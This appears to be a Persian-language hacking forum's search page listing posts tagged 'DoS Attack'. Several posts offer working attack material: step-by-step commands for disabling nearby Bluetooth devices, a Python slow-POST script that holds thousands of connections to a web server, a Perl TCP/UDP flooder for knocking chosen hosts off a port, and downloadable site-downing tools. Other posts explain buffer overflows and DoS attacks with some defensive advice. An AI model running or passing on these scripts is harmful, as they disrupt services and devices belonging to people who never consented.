رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'DoS Attack'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. R3DN4X314

    حمله DOS به BlueTooth

    با استفاده از ابزار زیر میتونید دیوایس های مختلفی که با استفاده از بلوتوث سرویس میدن رو از کار بندازید و از شکل گیریه ارتباط جلوگیری کنید این ابزار با پایتون 3 نوشته شده و برای استفاده در سیستم عامل لینوکس تعریف شده ، برای جلوگیری از بروز خطا و نصب ابزار های کمکی ترجیحا از کالی لینوکس استفاده کنید با دستور زیر ابزار رو دانلود کنید : $ sudo git clone [Hidden Content] حالا باید محدوده رو‌ برای شناسایی بلوتوث های باز اسکن کنیم ، که میتونیم از hcitool استفاده کنیم , که ابزار رو دانلود میکنیم : $ sudo apt update $ apt install hcitool در مرحله بعد با فعال کردن سرویس بلوتوث و استفاده از ابزاری که دانلود کردیم ، اسکن رو شروع میکنیم : $ sudo service bluetooth start $ hcitool scan که خروجیه پروسه اسکن به شکل زیر قابل مشاهده میشه : A1:B2:C3:D6:E7 Xiaomi portable speaker B1:C2:D3:E4:F5 iPhone(Toivo) C1:D2:E3:F4:G5 Some Bluetooth device حالا ادرس تارگت انتخابی رو ، اینجا مثلا A1:B2:C3:D6:E7 به عنوان ورودی میدیم به ابزار
  2. MR.ROUTER

    نرم افزار ANONYMOUS DOSER

    با عرض سلام خدمت دوستان عزیز... همونطور که از اسمش پیداست از بهترین نرم افزارها برای down کردن سایت است... کار کردن با این نرم افزار خیلی ساده هست و نیاز به توضیح نداره... موفق باشید... ANONYMOUS DOSER.rar
  3. سلام دوستان اینم اسکریپت حمله داس از من داشته باشین به زبان پایتون هست import sys import struct import socket import time import threading #---------------------------------- MAX_CONN = 20000 PORT = 80 HOST = "**********" PAGE = "&&&&&&&&&&" #---------------------------------- buf=("POST %s HTTP/1.1rn" "Host: %srn" "Content-Length: 10000000rn" "Cookie: dklkt_dos_testrn" "rn" % (PAGE,HOST)) socks = [] def conn_thread(): global socks for i in range(0,MAX_CONN): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((HOST,PORT)) s.send(buf) print "Send buf ok! conn=%dn"%i socks.append(s) except Exception,e: print "Could not connect to server or send error:%s"%e time.sleep(10) #sys.exit(0) #end def def send_thread(): global socks while True: for s in socks: try: s.send("f") #print "sendok!" except Exception,e: print "Send Exception:%sn"%e socks.remove(s) s.close() time.sleep(1) #end def conn_th=threading.Thread(target=conn_thread,args=()) send_th=threading.Thread(target=send_thread,args=()) conn_th.start() send_th.start()
  4. MR.ROUTER

    نرم افزار rDOS

    سلامی دوباره خدمت دوستان عزیز گارد ایران یه برنامه دیگه که مخصوص DOWN کردن سایت هست رو تقدیمتون میکنم... موفق باشید یا حق.... rDos.rar
  5. چگونه ضعف در برنامه نویسی , می تواند باعث دسترسی به یک نرم افزار یا از کارانداختن اش شود ؟ حملاتی که آنها را سرریز بافر یا Buffer Overflow Attack می نامند . بافر چیست؟ اگر برنامه نویس باشید با این اصطلاح آشنایی دارید , به خصوص اگر با زبان C کار می کنید بافر قسمتی از حافظه است که به طور موقت برای نگه داری اطلاعات یک نرم افزار اختصاص یافته است اطلاعات پیش از رسیدن به محل اصلی در مکانی به نام بافر به صورت موقت ذخیره میشوند بافر معمولا یک ظرفیت از پیش مشخص شده دارد که توسط برنامه نویس تعیین می شود . تصور کنید نرم افزاری دارید که یک بافر با سایز ثابت 128 بایت دارد حالا اگر یک مهاجم 1000 بایت دیتا برای این بافر ارسال کند چه اتفاقی رخ میدهد؟ ظرف شما از آب پر می شود و سر ریز می کند در چنین حالتی یک نرم افزار واکنش های متفاوتی از خودش بروز می دهد که قابل پیش بینی نیست . برای مثال سرور ایمیل شما تحت چنین حمله ای قرار می گیرد و بر اثر سرریز بافر کرش کرده و از کار می افتد ؛ سرریز بافر یک راه شایع و خطرناک برای حمله به سرویس ها و دیتابیس هاست اما ماجرا به همینجا ختم نمیشود ؛ در ادامه از طریق این حملات می توان کنترل کامپیوتر میزبان را هم به دست گرفت ! تصور کنید سرویس ایمیل شما بر مبنای یونیکس کار می کند و با Root فعال است این سرویس در فرم ورود به سایت آدرس ایمیل کاربر را بررسی می کند حالا هکر به جای آدرس ایمیل یک دستور ارسال می کند که سبب سرریز بافر شده و شامل دستورهای یونیکسی است که باعث می شود کامپیوتر هدف آنها را اجرا کند با این کار هکر دسترسی کامل سرور را در دست می گیرد * این دستورها معمولا با زبان اسمبلی ارسال می شوند و ساختن مجموعه دستوری که بتواند در کامپیوتر هدف اجرا شود کار بسیار سختی است اما دستورهای حمله به بسیاری از اپلیکیشن ها از قبل نوشته شده و با یک جستجو می توان آن را پیدا کرد , بنابراین حمله برای یک هکر کار سختی نخواهد بود برای جلوگیری از این حملات به چند راهکار اساسی عمل کنید : - اگر برنامه نویس هستید فراموش نکنید که از همان ابتدای کد نویسی و طراحی , امنیت را یک گوشه از ذهن تان قرار بدهید - تمام ورودی های کاربر را از قبیل فرم ها , بررسی کنید تا فقط اطلاعات مورد نظر شما امکان عبور را داشته باشند - نرم افزارها و اپلیکیشن ها را آپدیت نگه دارید - تست نرم افزارتان را برای این گونه حملات فراموش نکنید - و در پایان سرویس هایی را که استفاده نمی کنید , غیرفعال کنید .
  6. یک ابزار قدرتمند برای انجام حملات dos #!usr/bin/Perl#Coded by Phizo#This perl application is a Flooder/DoS Script. Although it isn't as powerful as a botnet but it can still come in handy.use IO::Socket;print "n=======================================================**************************************************====******* TCP&UDP DoS Script - Coded by Phizo. *******= =**************************************************=========================================================na";print "nHelp: You will be prompted with three boxes. Host, Protocol and Port. Host means the IP Address of the computer you want to attack, Protocol is to flood TCP or UDP to flood both type TCP,UDP in the box, and port is the port you would like to boot them off example: MSN is port 1863, Web browser is port 80.na";print "nHost:a";chomp ($host = );print "nProtocol:a";chomp ($proto = );print "nPort:a";chomp ($port = );{$sock = IO::Socket::INET->new(Proto=>"$proto", PeerAddr=>"$host", PeerPort=>"$port") || die "nCould not connect to the remote machine. Either the machine is offline or the port is not in use on the selected protocol.a";}Packets:while (1) {$size = rand() * 8921873 * 9991988;print ("Flooding: $host:$port~$proto Packets Sent: $sizen");send($sock, 0, $size)}
  7. درود این فیلم برای دوستانی که با حملات داس و دیداس (Dos & DDos) آشنای ندارند تهیه کردم . در این فیلم توضیح مختصر و مفیدی در مورد حملات داس و دیداس داده میشود. پسورد فایل : guardiran.org DoS-Attack.rar
  8. با سلام در این فیلم آموزشی به شما آموزش میدم که چطور میشه در کالی لینوکس Kali linux و توسط یکی از ابزارهای خوب کالی لینوکس بنام Websploit حمله داس ( DOs - DDOS Attack ) رو انجام داد و در فیلم توضیحات داده شده و کاملا گویا هست . پسورد فایل : guardiran.org موفق باشین DOS Attack.rar
  9. kingdeface

    انواع و بررسی حملات DOS - DDOS

    DOS Attack متداول ترین و مشهورترین نوع حملات Dos ، زمانی تحقق می یابد که یک مهاجم اقدام به ایجاد یک سیلاب اطلاعاتی می کند و وقتی که دیتای زیادی درشبکه درحال انتقال می باشد امکان حمله داس بیشتر خواهد شد . زمانی که شما آدرس URL یک وب سایت خاص را ا زطریق مرور گر خود تایپ می نمایید درخواست شما برای سرویس دهنده ارسال می گردد و سرویس دهنده هرلحظه قادربه پاسخگویی به حجم محدودی از درخواست ها می باشد ، بنابراین اگریک مهاجم با ارسال درخواستهای متعدد و سیلاب گونه باعث افزایش حجم عملیات سرویس دهنده گردد ، قطعا امکان پردازش درخواست شما برای سرویس دهنده وجود نخواهد داشت . حملات فوق از نوع DOS می باشند ، چرا که امکان دستیابی شما به سایت مورد نظر سلب شده است و یک مهاجم می تواند با ارسال پیام های الکتریکی ناخواسته که ازآن با نام Spam یاد می شود حملات مشابهی رامتوجه سرویس دهنده پست الکترونیک نماید. هر account پست الکترونیک (صرف نظر از منبعی که آنان را دراختیارشما قرارمی دهد، نظیر سازمان مربوطه ویا سرویسهای رایگانی نظیر یاهو دارای ظرفیت محدودی می باشند) پس از تکمیل ظرفیت فوق ، عملا " امکان ارسال Email دیگری به account فوق وجود نخواهد داشت و مهاجمان با ارسال نامه های الکترونیکی ناخواسته سعی می نمایند که ظرفیت account مورد نظر را تکمیل و عملا" امکان دریافت email های معتبر را از account فوق سلب نمایند . حملات Dos هزینه بالایی دارند و این حملات می توانند از یک شبکه محلی یا از بیرون شبکه شروع شوند و نیز یک حمله Dos را از طریق تلاش آشکار حمله کننده برای جلوگیری از استفاده کاربران قانونی یک سرویس از آن سرویس ، شناسایی می کنند. ازجمله این تلاش ها می توان به موارد زیر اشاره کرد: * انواع طغیانهای شبکه شامل طغیان های TCP , UDP : وICMP که ترافیک قانونی سایت را مختل می کند. * تلاش در جهت قطع ارتباط دو ماشین ودر نتیجه عدم امکان استفاده ازسرویس آنها. * تلاش در جهت ممانعت از دسترسی فردی خاص به یک سرویس . * تلاش برای خرابکاری در ارائه سرویس به سیستم یا شخص خاصی. از دیدگاه فنی ، حملات DOS به دو دسته زیر تقسیم می شوند : ** حمله ای که مستقیما منجر به توقف سرویس های ماشین می شود . ** حمله ای که منجر به اشباع یک سرویس دهنده و تلف شدن منابع آن شود. .
×
×
  • ایجاد مورد جدید...